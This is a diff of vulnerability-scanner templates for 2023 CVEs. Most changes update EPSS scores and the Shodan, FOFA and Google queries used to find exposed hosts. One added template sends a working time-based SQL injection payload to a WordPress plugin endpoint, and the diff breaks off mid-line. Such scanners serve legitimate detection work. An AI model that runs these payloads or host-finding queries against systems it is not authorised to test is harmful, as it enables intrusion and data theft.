a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -15,14 +15,25 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2948 cwe-id: CWE-79 + epss-score: 0.0031 + epss-percentile: 0.69965 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - vendor: open-emr - product: openemr - fofa-query: app="OpenEMR" - shodan-query: http.favicon.hash:1971268439 verified: true max-request: 1 + vendor: open-emr + product: openemr + shodan-query: + - http.favicon.hash:1971268439 + - http.html:"openemr" + - http.title:"openemr" + fofa-query: + - app="OpenEMR" + - body="openemr" + - title="openemr" + - app="openemr" + - icon_hash=1971268439 + google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr http: @@ -37,4 +48,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save")' condition: and -# digest: 490a0046304402201f348c1ad965519aec601dea4e3594a4203bb91d9386861d1e29e43cfc7f69de02206a1be3fef962ba9fa56678781c5c622f895d192dac29bdfc696cee29e7e75608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f75ee0bf3548c6e7595f29a72d38b6dd4442e39a8f5b2f583c8c7a314bedc42c022000d638474aa0e1e916e4216405f28f871f3d48cda2d19cb51b36dc1e7a2b5b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index e73411002b..a3e202a1eb 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -21,15 +21,25 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29489 cwe-id: CWE-79 - epss-score: 0.00302 - epss-percentile: 0.69029 + epss-score: 0.00354 + epss-percentile: 0.71955 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: cpanel product: cpanel - shodan-query: title:"cPanel" + shodan-query: + - "title:\"cPanel\"" + - http.title:"cpanel" + - cpe:"cpe:2.3:a:cpanel:cpanel" + - http.title:"cpanel - api codes" + fofa-query: + - "title=\"cpanel - api codes\"" + - title="cpanel" + google-query: + - "intitle:\"cpanel - api codes\"" + - intitle:"cpanel" tags: cve,cve2023,cpanel,xss http: @@ -51,4 +61,4 @@ http: - type: status status: - 400 -# digest: 4a0a0047304502200544d1f287ef41ae3cf088e290845e98c86d059cde854153d5728b086b85bdfd022100a7c78b65dd8998d0e467a3f16f1088a53834df949f7eb311ad454545bb94a924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200eeb293fb45080f8fe24ade360d2b725f37f3fe91271d74d972c46e7d5e439f802202a1364e4da300a7118361484b5e10c047d1a545d6dff08b59ed2989b090de0d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index 250149ced7..89d7068e3c 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -17,12 +17,21 @@ info: cwe-id: CWE-79 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - vendor: open-emr - product: openemr - fofa-query: app="OpenEMR" - shodan-query: http.favicon.hash:1971268439 verified: true max-request: 1 + vendor: open-emr + product: openemr + shodan-query: + - http.favicon.hash:1971268439 + - http.html:"openemr" + - http.title:"openemr" + fofa-query: + - app="OpenEMR" + - body="openemr" + - title="openemr" + - app="openemr" + - icon_hash=1971268439 + google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr http: @@ -37,4 +46,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "openemr")' condition: and -# digest: 4a0a004730450220108fa66c2cdc6c8b7680bd5104e88e717b840d2571b4c6ad031c039f4eb9ccd6022100b75192c2cd5ddb7e9874af2830784c6516ea54684cde65e41b82e565b835337a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220500a6ac69d9b91d6545f65f7bcafcf9b7188f224274078078fb6020f34c0bc99022100d60da773d8a14a171a971b57098100a9f6589bef9610c2d6b7549c8859f0fa08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 9bf1169f66..1449ca693b 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29622 cwe-id: CWE-89 - epss-score: 0.01215 - epss-percentile: 0.83777 + epss-score: 0.02992 + epss-percentile: 0.90889 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -47,4 +47,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect")' condition: and -# digest: 4a0a0047304502205d36519b2b9f835993cdd262417eb59d35354c534b521ef5fb2370a1c458c9a8022100c1e191f5a47e74a627e434f122480e556641bbcac52be4eb662700639ef081a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205279b241ecf32df15ffa523a7a164a86fb770d7bdac0be256ffd4930452d13f5022100d4cc576894eab1b14574b357ab4f365e85a04c865af32e12d28f03751d468c34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 3d9f1ab7bc..cf869b7479 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29623 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39785 + epss-score: 0.00135 + epss-percentile: 0.48708 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019bdab29e51dac4ed47397495129a499977a1bcca1b6f4aa9fb44263cd1fd6e102210085a75d4c523c5f312ddc0094d76eadb0df067f909c152ea57a61f08803e30f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc71821162025f268ee5de222f4750561754c1016a473fd7d517ef248346aab3022100ac4cfc3d8539f0cf3e45603921ce9c36ebc9d9bc6791db60bf92773225d50f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 2875a9c12c..1e17136867 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2982 cwe-id: CWE-288 - epss-score: 0.01566 - epss-percentile: 0.86966 + epss-score: 0.01321 + epss-percentile: 0.85956 cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100afeced594594dd08a04c07ba80120871493fa8c243e6b0ef758019f4c205e85b02200230f234069d1a181ab48796a446082f79a84ea10df897f4a908d19937430551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c28840dd8c5d877ad17fee5a4648ac22eb280a8543450e50cb4787c1ee46b1a022100b8173ae2b3d38dadfb44dc8dc366e496b370d100b05b48f88dd3aa2099f80896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 46f7357b4a..4d3bdb8509 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -19,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29827 cwe-id: CWE-74 - epss-score: 0.34849 - epss-percentile: 0.97005 + epss-score: 0.09885 + epss-percentile: 0.94826 cpe: cpe:2.3:a:ejs:ejs:3.1.9:*:*:*:*:node.js:*:* metadata: max-request: 1 vendor: ejs product: ejs framework: node.js - tags: cve,cve2023,ssti,rce,ejs,oast + tags: cve,cve2023,ssti,rce,ejs,oast,node.js http: - method: GET @@ -45,4 +45,4 @@ http: part: body words: - "You are viewing page number" -# digest: 4b0a00483046022100d7ea0d1d7ce9e00af5998f5fa4b5960a70b471e26ecf0caf0577424bace640e0022100ba8f5c9f03136d87aa25b2eab3b136501334d2a57e61dbf0d049f384be7946e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040fbd22e716c79b0a20e657462a64ef99f5cd107f15eb5f771858c4851b9044e022100ecf3549f0a01b1fa01303dae9809365f29e5ea69118cf7de34bd0ca2e9ba9614:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 007a2a898d..0d4b60c14e 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-29887 cwe-id: CWE-22 - epss-score: 0.00439 - epss-percentile: 0.721 + epss-score: 0.00553 + epss-percentile: 0.7749 cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* metadata: verified: true @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6a10d91f4e2d28dc442dc69d39787fca8f48d3665e1aa5b7302f46d7e64adb50221008092f2e0bfd73056671fafbd4c51267037ee1b7dc14bb039da07d3cc9d932712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005705319fbc90464db11a2808fdf787408f2afac55b623fd0b9f8762003f871b022100a345f4f918983f4b23c2b0d88e62b9122872ebcaa97b2632ade1ce647c182003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index 135a9b9ed2..e71dbf7b00 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.1 cve-id: CVE-2023-29919 cwe-id: CWE-276 - epss-score: 0.01262 - epss-percentile: 0.84199 - cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* + epss-score: 0.54171 + epss-percentile: 0.97625 + cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec - product: solarview_compact_firmware - shodan-query: http.html:"SolarView Compact" + product: solarview_compact + shodan-query: + - http.html:"SolarView Compact" + - cpe:"cpe:2.3:h:contec:solarview_compact" tags: cve,cve2023,lfi,solarview,edb,contec http: @@ -58,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fd7ddf822741cbb8cb540da455a368436390b59002c7d45d86ff3b215e5c0031022100b790118b57ec90b22542dd1430c2322ddd5a973995928cadab5c6ead98895a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2b60a759d1ea30666861f4fe152a5da9c502f8a2dae5e08a1f196fbb87c8fd5022030315f3ca3d819532851d2c6b5affe83eab39e97b60b9b4e65709c2b22b10ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index bf1c5ccaef..a711f9507a 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -13,21 +13,29 @@ info: reference: - https://github.com/PowerJob/PowerJob/issues/585 - https://nvd.nist.gov/vuln/detail/CVE-2023-29922 + - https://github.com/CN016/Powerjob-CVE-2023-29922- + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/1820112015/CVE-2023-29923 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2023-29922 cwe-id: CWE-1188 - epss-score: 0.00791 - epss-percentile: 0.79603 + epss-score: 0.00822 + epss-percentile: 0.81865 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: powerjob product: powerjob - shodan-query: html:"PowerJob" - fofa-query: app="PowerJob" + shodan-query: + - html:"PowerJob" + - http.html:"powerjob" + fofa-query: + - app="PowerJob" + - app="powerjob" + - body="powerjob" tags: cve,cve2023,auth-bypass,powerjob variables: str: "{{rand_base(6)}}" @@ -58,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bfbf1a8c87f9cb5f380257f32742fe3fbfc2ca545f5b61c3df52cb89048fb3b6022100a84526343d726f724f54e529c4771d5ee2037c66a32041da550cb9f158ef4fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200551a619de394d4d567ac4e528391a61d1f79adb6342a9c1a59e529d5caec602022100bfa2585de4b197ec63b527a877403c3e33c6b89112787f02e57ffa692bdcc2bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index 2ec2422aee..5fbb00ff33 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -13,20 +13,27 @@ info: reference: - https://github.com/PowerJob/PowerJob/issues/587 - https://nvd.nist.gov/vuln/detail/CVE-2023-29923 + - https://github.com/KayCHENvip/vulnerability-poc + - https://github.com/Le1a/CVE-2023-29923 + - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-29923 cwe-id: CWE-276 - epss-score: 0.00336 - epss-percentile: 0.68252 + epss-score: 0.01633 + epss-percentile: 0.8751 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: powerjob product: powerjob - fofa-query: app="PowerJob" + shodan-query: http.html:"powerjob" + fofa-query: + - app="PowerJob" + - app="powerjob" + - body="powerjob" tags: cve2023,cve,powerjob,unauth http: @@ -53,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032e5f7965419954c1523bd95cc68756e7f62b769f31076e1ff2e08194e254dc30221008f9246b5ee4e77f13e735e7b0b05b95259fcc150a4197f844348b56a200d8160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008812501948bfde98e323a23aa07dff8cc2f85c867074eb9052aec2e781cfc1cb022100a1dfc72abb0b477705b0c37bb64cf66467246032b66f4dd5e70f8da86074d509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index 264135b800..ce7f0f190a 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30013 cwe-id: CWE-78 - epss-score: 0.9257 - epss-percentile: 0.98815 + epss-score: 0.96305 + epss-percentile: 0.99539 cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:* metadata: max-request: 2 @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de27474750e6704be6c10312547cdcae9d5fe1ef0ebb3501e7c8578e86e08d04022079ec35ddfb361ca3c6a39ed726e6e93da9077976851ec3bbff7a43e4204a5fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f4324b8d2cb69442b92a26914965f4d748dc23f82bbc7b0b14fd9b2859ce056022100842c47e8155cd53ac8552440f6d1e5980f0732976cacdb7a5c3b269793f26300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 50f4f54e0d..8a2fe3d1ef 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -19,15 +19,17 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30019 cwe-id: CWE-918 - epss-score: 0.00094 - epss-percentile: 0.38689 + epss-score: 0.0016 + epss-percentile: 0.52577 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: evilmartians product: imgproxy - shodan-query: "Server: imgproxy" + shodan-query: + - "Server: imgproxy" + - "server: imgproxy" tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians http: @@ -44,4 +46,4 @@ http: - type: status status: - 422 -# digest: 4b0a00483046022100f3383f2fbe7492efe4c31cc6431f25c5c5452d34e74b93108f7c4b44ed91fdd40221009ac4be31a0cff9f9737fcf1893fa400e0933a2863cec4612c7640ea4081d6c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dcedd4242d544537d56ad8d01e3272d6b737174013bbf66cea92b5ad411e9226022100ba3a4d4ee9e1b3b273437af26884efe235c0274765bb95446942e4046f45d8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index b2d26e1d2f..18cd1008ff 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-30150 cwe-id: CWE-89 - epss-score: 0.0409 - epss-percentile: 0.91941 + epss-score: 0.04505 + epss-percentile: 0.92462 cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: true @@ -29,7 +29,9 @@ info: vendor: leotheme product: leocustomajax framework: prestashop - shodan-query: http.component:"Prestashop" + shodan-query: + - http.component:"Prestashop" + - http.component:"prestashop" tags: cve2023,cve,prestashop,sqli,leotheme http: @@ -47,4 +49,4 @@ http: - 'duration_2>=6' - 'contains(tolower(response_1), "prestashop")' condition: and -# digest: 4a0a0047304502204f8f5546a345ebd6679d7326c8be4fdd9b4634f7da41d4e2a2371aa32354f8eb0221009d47704569e5ce942252fde8c0426bb71442d5f994d5aba7fb3f593b0e865e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086e5803369de03399b175dfff1f307f08d600d62f63e9173feee293e5989703702202117112bf80dd12f3b62170d2bbef25c52244259fca3902e92b9a05a70fd8a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index 031c0b56bf..a57620de22 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30210 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29245 + epss-score: 0.00113 + epss-percentile: 0.44693 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210084018e298a44acee3c2d3eb1556a8f01d7bf0139042553405d0073a774a97c48022057112439e4e35da6bbcb04cd8784377c767d0926a15aaac91a851caa83703256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e51be3a217490c7c4de70ac04fb0b0431a51b8fac4ffa6d6639ca0e89b4e0e30022100af07b85973c4cb21873160e102defa8952df672fd3dcbe651fe48656e79e23c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 6537669de8..5dd436dbcd 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30212 cwe-id: CWE-79 - epss-score: 0.02578 - epss-percentile: 0.89997 + epss-score: 0.03007 + epss-percentile: 0.90911 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* metadata: verified: true @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220634ca8a4ffd62bcb105aa07c8ed88c6b4c618002ce8971aed027cc69314c0293022100fcef9a2e98705ea6414ef80562a5b57e55c0340f6d7cf6020b1361769ebd8faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c32a30b9bc28b78bb36d839cac2ff6aa2f71f4a2ab78de882a2479cd3d7373f9022100ae591bbcff8497cc91817ed216fae39f7a9191562cdfb7884378410f8f221d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 7904f9a208..1fb78a3c0b 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30256 cwe-id: CWE-79 - epss-score: 0.0206 - epss-percentile: 0.87855 + epss-score: 0.00895 + epss-percentile: 0.8263 cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,packetstorm,xss,webkul-qloapps,unauth,webkul http: @@ -53,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100912b0803a7e5455d57a52707fe3ca217b6ce59f4cb312a7d20d93ed4d511c02c022004941e8d87c4edc496584e35ce2e3b2e5d1ce821828c03985db9ac734c6a4733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220299c58ac9d6a22e1c49ef45f97057ebad174785e1ec42d9b942926d1a73e5dca022100a786b9078630f2acbfe99f890a7fc9e4f487ab208a16be633daefac19163d791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index a5c4a2258f..04e479bc8f 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -13,13 +13,14 @@ info: - https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258 - http://packetstormsecurity.com/files/175672/MagnusBilling-Remote-Command-Execution.html - https://github.com/magnussolution/magnusbilling7/commit/ccff9f6370f530cc41ef7de2e31d7590a0fdb8c3 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-30258 cwe-id: CWE-78 - epss-score: 0.48813 - epss-percentile: 0.97205 + epss-score: 0.25604 + epss-percentile: 0.96696 cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: magnussolution product: magnusbilling shodan-query: http.html:"magnusbilling" + fofa-query: body="magnusbilling" tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution http: @@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022049027c19b0bf6f58b9b44aab3c55056e970467a85cc9e82b6a50722567aa4c0e02203a12757fe04db9aefaac1ade55009e909a82de1087a9ab7aa8d6511dd928d259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a071fe2d4bc54efa5a79cba38c20d2fcd7bb69536fc983c156b52ca187615775022079222e249bf01f2e55a560999af2aaf0c538e1a05be8152114ca492a3deffbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 620df48b01..74f467cbd5 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -19,14 +19,25 @@ info: cve-id: CVE-2023-30534 cwe-id: CWE-502 epss-score: 0.09326 - epss-percentile: 0.94158 + epss-percentile: 0.94688 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: cacti product: cacti - shodan-query: title:"Cacti" + shodan-query: + - title:"Cacti" + - http.title:"login to cacti" + - http.title:"cacti" + - http.favicon.hash:"-1797138069" + fofa-query: + - icon_hash="-1797138069" + - title="cacti" + - title="login to cacti" + google-query: + - intitle:"cacti" + - intitle:"login to cacti" tags: cve,cve2023,cacti,authenticated http: @@ -74,4 +85,4 @@ http: regex: - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]" internal: true -# digest: 4a0a0047304502207e107d63a92d437ea36fe3294ee12e5e23017f45c92427efb8ee2876d98f02bd022100b41521b425d00033c913385c3408da3b9ca4037df233817fb2d91c500620317f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083008a3793277d849d64ea59458090e4fd2be2ad78e2a8606675d58d5304f386022015a1039607a70aeb3c85adaa3626ab3b72da216d97120e78bbd5267c1c565608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index f760b82b3d..cb4ebf0d18 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-30625 cwe-id: CWE-89 - epss-score: 0.94833 - epss-percentile: 0.99223 + epss-score: 0.94887 + epss-percentile: 0.99286 cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100a271284d69cac1f4f872b9bff6588e356c8648cf640264b5606b808c55a3cfbd022100fb26ec06577c0fb74a98f0ba3f0cb1fda60beb381bb735d688514022df6bf3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021267676d2b0caf3b0abf2b1ad002c1b21aeb900af8aaf1da1431254edcfd2b40221009713d87ebfdea3a87e6e930de7a2d321010abf8c53a1dd14b45af1012c89bd02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml new file mode 100644 index 0000000000..8af1e6891f --- /dev/null +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -0,0 +1,60 @@ +id: CVE-2023-3077 + +info: + name: MStore API < 3.9.8 - SQL Injection + author: DhiyaneshDK + severity: critical + description: | + The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter. + impact: | + Allows an attacker to extract sensitive data from the database + remediation: | + Update MStore API WordPress Plugin to the latest version to mitigate the vulnerability + reference: + - https://wpscan.com/vulnerability/9480d0b5-97da-467d-98f6-71a32599a432 + - https://nvd.nist.gov/vuln/detail/CVE-2023-3077 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3077 + epss-score: 0.00148 + epss-percentile: 0.50816 + cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: inspireui + product: mstore_api + framework: wordpress + publicwww-query: "/wp-content/plugins/mstore-api/" + shodan-query: http.html:/wp-content/plugins/mstore-api/ + fofa-query: body=/wp-content/plugins/mstore-api/ + tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli,inspireui +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt" + + matchers: + - type: dsl + internal: true + dsl: + - 'status_code == 200' + - 'contains(body, "MStore API")' + condition: and + + - raw: + - | + @timeout: 15s + GET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + condition: and +# digest: 4a0a0047304502210091171dd408267411cabc960e5d1ff9a6cc6299020dff9d29668209282afd775f022051476c3f6fb097be3888576aec86db55ea003b433678d3b51cb06dd8d2f3794d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index a3784c4e80..719894083f 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30777 cwe-id: CWE-79 - epss-score: 0.00338 - epss-percentile: 0.70791 + epss-score: 0.00527 + epss-percentile: 0.76946 cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* metadata: verified: true @@ -51,4 +51,4 @@ http: - 'contains(body_2, 